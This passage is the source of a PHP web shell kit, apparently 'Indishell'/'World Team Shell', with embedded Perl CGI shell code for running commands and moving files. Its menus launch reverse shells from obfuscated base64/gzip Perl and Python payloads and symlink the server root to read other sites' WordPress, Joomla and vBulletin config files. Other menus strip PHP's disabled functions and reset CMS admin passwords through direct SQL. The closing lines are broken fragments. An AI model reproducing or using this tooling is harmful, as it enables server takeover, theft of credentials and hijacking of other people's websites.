else # failed to open file
{
&PrintPageHeader("f");
print "Failed to download $SendFile: $!";
&PrintFileDownloadForm;

&PrintPageFooter;
}
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}

if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");

# start the uploading process
print "Uploading $TransferFile to $CurrentDir...<br>";

# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;

$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.<br>";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.<br>";
print "File Path: $TargetName<br>";
}
else
{
print "Failed: $!<br>";
}
}
print "";
&PrintCommandLineInputForm;

&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}

# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}

if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
&PerformLogin;

}
elsif($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
&PerformLogout;
}';

$telfile = fopen("i/in.root" ,"w");

fwrite ($telfile,base64_decode($telnet));
    chmod("i/in.root",0755);
   echo "<iframe src=i/in.root width=100% height=40% ></iframe> ";


}


?>


<table width=100%>
<td align=center><a href="<?php echo "?wjc" ; ?>"><font color=white size=2 face="Open Sans Condensed"><b>--==[[</font><font color=red size=2 face="Open Sans Condensed">CMS based symlink,VBulletin,wordpress and Joomla admin panel password changer</font><font color=white size=2 face="Open Sans Condensed">]]==--</a></table>
<?php
echo $head;
if(isset($_GET['wjc']))
{
?>
	<table width=100%><tr><td align=center><font color="red" size="3" face="Open Sans Condensed">cms based
	symlink</font></a></td><td width=25% align=center><font color=white size=3 face="Open Sans Condensed">VBulletin-pass changer</font></a>


	</td><td align=center><font color=white size=3 face="Open Sans Condensed">wordpress-pass changer</font></a>


	</td><td width="20%"align=center><font color=red size=3 face="Open Sans Condensed">Joomla-pass changer</font></a> </td></tr><td align=left> <?php
//cms based symlink funcion



echo "<Form Method =Post ACTION =' '>";
echo "<font size=2 color=white face='Open Sans Condensed'>website username <input type='text' name='uname'>&nbsp&nbsp&nbsp<br> ";

echo "<font color='white' size=2 face='Open Sans Condensed'><Input type = 'Radio' Name ='config'  value='wordpress'><font color='white'>wordpress";
echo "<br><Input type = 'Radio' Name ='config' value= 'joomla'><font color='white' size=2 face='Open Sans Condensed'>joomla<br>";
echo "<Input type = 'Radio' Name ='config' value= 'vBulletin'><font color='white'  size=2 face='Open Sans Condensed'>vBulletin";
echo "<br><Input type = 'Radio' Name ='config' value= 'any'><font color='white' size=2 face='Open Sans Condensed'>public_html";
echo "<p>";
echo "<Input type = 'Submit' Name = 'Submit1' Value = '>>'>";
echo "</FORM>";

if(isset($_POST['Submit1']))
{
	$r=$_POST["config"];
if($r=="wordpress")
{

	$y=trim($_POST["uname"]);


 function curPageURL() {
 $pageURL = 'http';

 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];

 $pageURL =$URL;
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;

}

 $r= dirname(curPageURL());
  $x=$r."/indishell/root/home/".$y."/public_html/wp-config.php";

echo "<br \><a href=". $x."><font color=white size=2 face='Open Sans Condensed'>link to wp-config.php</a>";


	}
	elseif($r=="joomla")
	{
	$un=trim($_POST["uname"]);
	 function curPageURL() {
 $pageURL = 'http';

 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];

 $pageURL =$URL;
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;

}

 $r= dirname(curPageURL());
  $x=$r."/indishell/root/home/".$un."/public_html/configuration.php";

echo "<br \><a href=". $x."><font color=white size=2 face='Open Sans Condensed'>link to configuration.php</a>";
}


elseif($r=="vBulletin")
{

	$y=trim($_POST["uname"]);

	 function curPageURL() {
 $pageURL = 'http';

 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];

 $pageURL =$URL;
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;

}

 $r= dirname(curPageURL());
  $x=$r."/indishell/root/home/".$y."/public_html/includes/config.php";

echo "<br \><a href=". $x."><font color=white size=2 face='Open Sans Condensed'>link to includes/config.php</a>";



	}
	elseif($r=="any")
	{
	$y=trim($_POST["uname"]);

	 function curPageURL() {
 $pageURL = 'http';

 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];

 $pageURL =$URL;
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;

}

 $r= dirname(curPageURL());
  $x=$r."/indishell/root/home/".$y."/public_html/";

echo "<br \><a href=". $x."><font color=white size=2 face='Open Sans Condensed'>link to public_html directory</a>";


	}
	}



?>
</td>
<td width=25 align=right><font size=2 color=red face=Open Sans Condensed>

	<body bgcolor=black><font color=red><form method=POST>
<font size=2 color=white face='Open Sans Condensed'>Host:<input type=text name=lh value=localhost><br>
<font size=2 color=white face='Open Sans Condensed'>Datbase_name:<input type=text name="dbn" ><br>
<font size=2 color=white face='Open Sans Condensed'>Database_Username:<input type=text name="dbu"><br>
<font size=2 color=white face='Open Sans Condensed'>Database_password:<input type=text name="dbp"><br>
<font size=2 color=white face='Open Sans Condensed'><input type=submit name=sb value=">>" /> </form>
<?php
if(isset($_POST['sb']))
{
$r=$_POST["dbn"];
$s=$_POST["dbu"];
$t=$_POST["dbp"];


$Connect = @mysql_select_db($_POST['dbn'],mysql_pconnect($_POST['lh'],$_POST['dbu'],$_POST['dbp']));

   $sqlcm=@mysql_query("UPDATE 'user' SET 'password' = 'e68f496a84ae3e9d98c130992734648b','salt' = '+-~' WHERE 'userid' = '1' LIMIT 1");
if($sqlcm){
echo "try with password 0123456";
}
}


?>


</td><td width=25% align=right><font size=2 color=white face=Open Sans Condensed>Please define table_prefix from config file for accurate result,example $table_prefix='wp_'; here wp_ is table prefix (bydefault its wp_)
<form method=POST><font size=2>
	<br><font size=2 color=white face='Open Sans Condensed'>Host</font><font color=red><input type= name=ht value=localhost><br>
	<font size=2 color=white face='Open Sans Condensed'>Database_name</font><input type=text name=db_name ><br>
<font size=2 color=white face='Open Sans Condensed'>Database_user</font><input type=text name=db_us ><br>
<font size=2 color=white face='Open Sans Condensed'>Database_password</font><input type=text name=db_ps ><br>
<font size=2 color=white face='Open Sans Condensed'>table_prefix</font><input type=text name=tb_pr value=wp_><br>
<font size=2 color=white face='Open Sans Condensed'>New_username</font><input type=text name=nw_name ><br>
<font size=2 color=white face='Open Sans Condensed'>New_pass</font><input type=text name=nw_pass ><br>
<br>
<input type=submit name=smt value=">>" /></form></td><td width=25%  align=right>
<font size=2>Please define dbprefix from config file for accurate result,example var $dbprefix='jos_' ; here jos_ is dbprefix (bydefault its jos_)


	<br><form method=POST><br>
	<font size=2 color=white face='Open Sans Condensed'>Host</font><font color=red><input type= name=ht value=localhost><br>
	<font size=2 color=white face='Open Sans Condensed'>Database_name</font><input type=text name=db_name ><br>
<font size=2 color=white face='Open Sans Condensed'>Database_user</font><input type=text name=db_us ><br>
<font size=2 color=white face='Open Sans Condensed'>Database_password</font><input type=text name=db_ps ><br>
<font size=2 color=white face='Open Sans Condensed'>Dbprefix</font><input type=text name=db_pf value=jos_><br>
<font size=2 color=white face='Open Sans Condensed'>New_username</font><input type=text name=nw_name ><br>
<font size=2 color=white face='Open Sans Condensed'>New_pass</font><input type=text name=nw_pass ><br>
<br>
<input type=submit name=smit value=">>" /></form></td></tr></table>
<?php }
?>

</table>

</table>
<table border=1 width=100%><tr><td align=center><a href="<?php echo '?perlbackconnect';?>"><font size=3 face="Open Sans Condensed" color=white>--==[[PERL Back connect ]]==--</font></a><br>


<?php
if(isset($_GET['perlbackconnect']))
{ ?>
<font size=2 face="Open Sans Condensed" color=white>
	<p><form method=POST action="">
Client ip:<input type=text name=ip value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
Connection Port:<input type=text name=port /><p>

<input type=submit name=sbm value=">>" /></form>
</font>

<?php


if(isset($_POST['sbm']))
{
	$r=$_POST["ip"];
	$s=$_POST["port"];
	$p1 ='hVNhb5swEP0eKf/hSqsFpNCE9sOkRFTLUtKibU0FJJrEUGTgWlCJHWGzJZr234dNqBKlVY0E9rtnv3e+4/xsUPFyEOd0sMGy6Ha6nYojuPPRyGfJC4qxhC74jgtcgw09RY0Jz3pNZOLdTe0v9Xup1psypwI0ME3bDsOvJHmZMkoxEeBnWBRRZNumCb/onhCzLbA/FFOIdxAgWYNL05wfUWsyaOrw/Al0JXhmXxnwV0KwF1xw8owjuBhCeM+4iCB8ZGX9kdubzZDmCJqzVSTr6vPlsH4ssK6ta2g5/9r8D3KXy1le4D2haYEK4iqq+/PpNyfow+Ns5T7IiQRWfuA5kx99eEaxKZlg8Y6SNeo9kWx6hgGsVEb2tkMzggUlcYEgGHjIWfEbQWbQWkqa63sVk9okTctVTtVdLEMr6kNOUayIYC02jIwPtNqyHGo1VZazRs28IZVgT0XFM91QDLZBqvvBrfvQB+3mU0PTjmPzRdB/L+Z43kms9Sfr/Nb4qJUOvetaRTnWWbl+MHO/O2No1v5k6UgMxphkrAbrkoBJYPw6VQF10t5W28nv+ak7d37Suf5J5761N61SvFSjQMEhwy2ILOfAs1zAz1s4POAou/1/2Bg8d+azbuc/';

   $dec= gzinflate(base64_decode($p1));
   $fname = fopen('backconn.pl','w');
     fwrite($fname,$dec);
      $d="backconn.pl";
     $ch="chmod +x ".$d ;
            $permission= system($ch);

            $z="perl ".$d." ".$r." ".$s;
            $run= system($z);

 }

}
?>
</table><table border=1 width=100%><tr><td align=center>
<a href="<?php echo '?pythonbackconnect'?>">--==[[Python Back connect]]==--</a><p>
<?php
if(isset($_GET['pythonbackconnect']))
{
	?>
<form method=POST >
Clientip:<input type=text name=pyt value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
port:<input type=text name=port /><p>

<input type=submit name=pyb value=">>" /></form>
</font>
<?php
}
?>
<?php
if(isset($_POST['pyb']))
{
	$r=$_POST["pyt"];
	$s=$_POST["port"];
	$py = 'fVLfS8MwEH4X/B9u9WEptJ1O8UEouI0JIjpwe+vK6I/bGpYmJUnV+tebrF2dIEsgucv33eXj7q4Go1rJUUr5qGp0IfjlRbtpWQmpQTXKAyWyPWoPhLXrtJIiQ6WOzEIoDaFlBoncfUQ3sX09RIdAuSY9Mo7dY1CbMlCoc9wmNdOalihqTe6ve45BIM2I+2AdAC2bzgKjaG+/7JIcLtJ5k6fN89t85XXucjF72SxX7/PJq3sSHWSCc8w0IVa+Z9W6f3CFPCfD4fD41q4cP5CJCiWILeiCKlCZpJUGY6V3TCffiXzclQll5oMS1vxv+Ony/TCMoqn4gsUnxxymDawwKeGZ53RZIGNxHIa+b3KsudHRixMqyOtqTKzILWXIBXG96/PwzXl4fB6+/S2M1WUL3w9BkCWMkcg5TJAqHM/xqRN3AfiVoalN14muw30PK2mGA5xoEMOsbQYVHCwrB8Nz/suBUgrpAf6XZG4x+CyMbOi6S/nOMeyWbE87Tj8=';

   $dec= gzinflate(base64_decode($py));
   $fname = fopen('backconn.py','w');
     fwrite($fname,$dec);
      $d="backconn.py";
     $ch="chmod +x ".$d ;
            $permission= system($ch);

            $z="python ".$d." ".$r." ".$s;
            $run= system($z);

 }
?>

</table>
<table width=100%><tr><td
	align=center><a href="<?php echo '?ds';?>"><font color=white size=3 face="Open Sans Condensed" >--==[[Generate php.ini file]]==--</a>

<?php
if(isset($_GET['ds']))
{
	$htcs  = " disable_functions =none ";
$f = fopen('php.ini','w');


fwrite($f , $htcs);



 function curPageURL() {
 $pageURL = 'http';

 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];

 $pageURL =$URL;
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;

}

 $r= dirname(curPageURL());
  $x=$r."/php.ini";

echo "<br \><a href=". $x."><font color=white size=4 face='Open Sans Condensed'><u>link  to php.ini</u></a>";

}
?></td>
</tr>

	</font></font></font>

</table>
<table border=1 width=100% hight=100%><td align=center> <a href="<?php echo '?bypasser'?>"><font
	color=white size=2 face="Open Sans Condensed"><b>--==[[</font><font color=red size=2 face="Open Sans Condensed">"Can't read /etc/named.conf" bypasser+auto symlink public_html directory</font><font color=white size=2 face="Open Sans Condensed">]]==--</b><br>
	</a>
	<?php

	if(isset($_GET['bypasser']))
	{
		?>
		<font size=3 color=white face="Open Sans Condensed">Put the websites names(as many as you want) in the  textbox given below for auto symlink websites<br><font color=red><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="20" width="50%"><span class="footerlink">Special f**k goes to my best buddy --> "Suriya CyberTyson" :P</span></marquee><br></font>
	<form method=post>
	<font color=white size=2 face=Open Sans Condensed>websites name<br><textarea rows=6 cols=45 name=wen></textarea>
	<br><br><input type=submit name=cant value="bhaiyu.... click me and i will try to hex this shit XD" /></form><p>


		<?php
		}
	error_reporting(0);
	$tt=$_POST["wen"];




if(isset($_POST['cant']))
{

	mkdir('INDIshell',0777);
$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f = fopen('INDIshell/.htaccess','w');

$indishell = symlink("/","INDIshell/root");

fwrite($f , $rr);

	function RemoveLastSlash($host)
{
	if(strrpos($host, '/', -1) == strlen($host)-1)
	{return substr($host,0,strrpos($host, '/', -1));}
	else{return $host;}
}

	echo "<font color=red>";
	$tt=trim($_POST["wen"]);
	$txt=explode("\n",$tt);
	echo "<table align=center border=1 width=50%>
<tr><td align=center><font size=3 face='Open Sans Condensed' color=white>website(url)</td><td align=center><font size=3 face=Open Sans Condensed color=white>username</font></td><td align=center><font size=3 face=Open Sans Condensed color=white>auto symlink</font></td></tr>";
	foreach($txt as $text)
	{
	$text1=trim($text);
	$te1 = ereg_replace("(https?)://", "", $text1);
	$te2 = ereg_replace("www.", "", $te1);
	$te=RemoveLastSlash($te2);
	$u = posix_getpwuid(@fileowner("/etc/valiases/".$te));

echo "<table align=center border=1 width=50%><tr><td align=center><font size=3 face='Open Sans Condensed' color=white><a href=http://".$te."><font size=3 face='Open Sans Condensed' color=red>".$te."</a></font></td><td align=center><font size=3 face='Open Sans Condensed' color=white>". $u['name']." </font></td><td align=center><a href=INDIshell/root/home/".$u['name']."/public_html/><font size=3 face='Open Sans Condensed' color=white>spin the shit XD</a></tr></table>";
flush();




}

}




	?>



	</table>
<table border=1 width=100% hight=100%><td align=center> <a href="<?php echo '?symlink'?>"><font
	color=white size=3 face="Open Sans Condensed">--==[[Symlink the "/" folder]]==--<br> (run php.ini before symlink for batter results)
	</a>


	<?php
error_reporting(0);
if(isset($_GET['symlink']))
	{



$mk = mkdir('indishell',0777);




$r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f = fopen('indishell/.htaccess','w');

$indishell = symlink("/","indishell/root");

fwrite($f , $r);
function curPageURL() {
 $pageURL = 'http';

 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];

 $pageURL =$URL;
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;

}

 $r= dirname(curPageURL());
 if(!is_dir('indishell/root'))
 {
	 echo "<br>sorry";}
	 else {
  $x=$r."/indishell/root";
echo "<p><a href=".$x."><font color=white size=4 face='Open Sans Condensed'><u>check this link for symlink </u></a>";
}
}
?>


	</font></td></table><table width=100%><td align=center><a href="<?php echo '?etv'?>"><font
	color=white size=3 face="Open Sans Condensed">--==[[username (ls /etc/valiases)]]==-- </a>

	<?php
echo "<font color=white>";
if(isset($_GET['etv']))

{
echo $head;

	echo "<form method=post>";
	echo "<font color=white size=4 face=Open Sans Condensed>website name :<input type=text name=webn>";
	echo "<br>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type=submit name=we value=^_^ /></form><br>";
	}


?>
<?php

if(isset($_POST['we']))
{
	$text=$_POST["webn"];

	$text1=trim($text);
	$te1 = ereg_replace("(https?)://", "", $text1);
	$te = ereg_replace("www.", "", $te1);


	$u = posix_getpwuid(@fileowner("/etc/valiases/".$te));

echo "<table align=center border=1 width=40%><tr><td align=center><font size=3 face='Open Sans Condensed' color=white><a href=http://".$te."><font size=3 face='Open Sans Condensed' color=red>".$te."</a></font></td><td align=center><font size=3 face='Open Sans Condensed' color=white>". $u['name']." </font></td></tr></table>";
flush();





}







?>




	</td></tr></table><table width=100%><td align=center><a href="<?php echo '?du';?>"><font
	color=white size=3 face="Open Sans Condensed">--==[[website and
	username]]==--<br></a>

	<?php
if(isset($_GET['du']))
{

$d0mains = @file("/etc/named.conf");

if(!$d0mains){ die("<font size=3><b><font color=white>error in reading /etc/named.conf "); }

echo "<table align=center border=1>
<tr><td><font size=3 face='Open Sans Condensed'>website</td><td><font size=3 face=Open Sans Condensed>username</font></td></tr>";

foreach($d0mains as $d0main){

if(eregi("zone",$d0main)){

preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();

if(strlen(trim($domains[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo "<tr><td><a href=http://www.".$domains[1][0]."/><font color=white face='Open Sans Condensed'>".$domains[1][0]."</a></td><td><font color=white face='Open Sans Condensed'>".$user['name']."</td></tr>"; flush();

}}}
}?>
</td>

<?php
if(isset($_GET['wp-reset']))
{
	?>


<?php
}

?>
<?php
if(isset($_POST['smt']))

{
	$host=$_POST["ht"];
	$dbn=$_POST["db_name"];
	$dbu=$_POST["db_us"];
	$dbp=$_POST["db_ps"];
	$nn=$_POST["nw_name"];
	$np=$_POST["nw_pass"];
	$tp=$_POST["tb_pr"];
    $npwd= md5($np);
	$dbconnect=@ mysql_connect($host,$dbu,$dbp);
	$dbslect=@ mysql_select_db($dbn);
	$npwd= md5($np);
	$ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$nn."' WHERE ID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;

	if(!$ru)
      {
		  echo "<font size=2 color=white face='Open Sans Condensed'><br>something went wrong :P";
		  }
		  else {

			  echo "<font size=2 color=white face='Open Sans Condensed'><br>Bhai ji,try to login with new password :D";
			  }

		}



?>

<?php
if(isset($_POST['smit']))

{
	$host=$_POST["ht"];
	$dbn=$_POST["db_name"];
	$dbu=$_POST["db_us"];
	$dbp=$_POST["db_ps"];
	$dp=$_POST["db_pf"];
	$nn=$_POST["nw_name"];
	$np=$_POST["nw_pass"];
	$npwd= md5($np);
	$dbconnect=@ mysql_connect($host,$dbu,$dbp);
	$dbslect=@ mysql_select_db($dbn);
	$npwd= md5($np);
	$run =@mysql_query("UPDATE `".$dp."users` SET username ='".$nn."' WHERE usertype ='Super Administrator'");
$run =@mysql_query("UPDATE `".$dp."users` SET password ='".$npwd."' WHERE usertype = 'Super Administrator'");
$run =@mysql_query("UPDATE `".$dp."users` SET username ='".$nn."' WHERE usertype = 'deprecated'");
$run =@mysql_query("UPDATE `".$dp."users` SET password ='".$npwd."' WHERE usertype = 'deprecated'");
	if(!$run)
      {
		  echo "<font size=2 color=white face='Open Sans Condensed'><br>something went wrong :P";
		  }
		  else {

			  echo "<font size=2 color=white face='Open Sans Condensed'><br>Bhai ji, try to login with new password :D";
			  }


}


?>






'; file_put_contents("whsg.php",base64_decode($joomlaBrute));; echo "

World Team Shell


"; } } ?>

'; echo '    '; if( isset($_POST['sut']) ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'upload done<

'; } else { echo 'Upload failed :P
'; } } ?>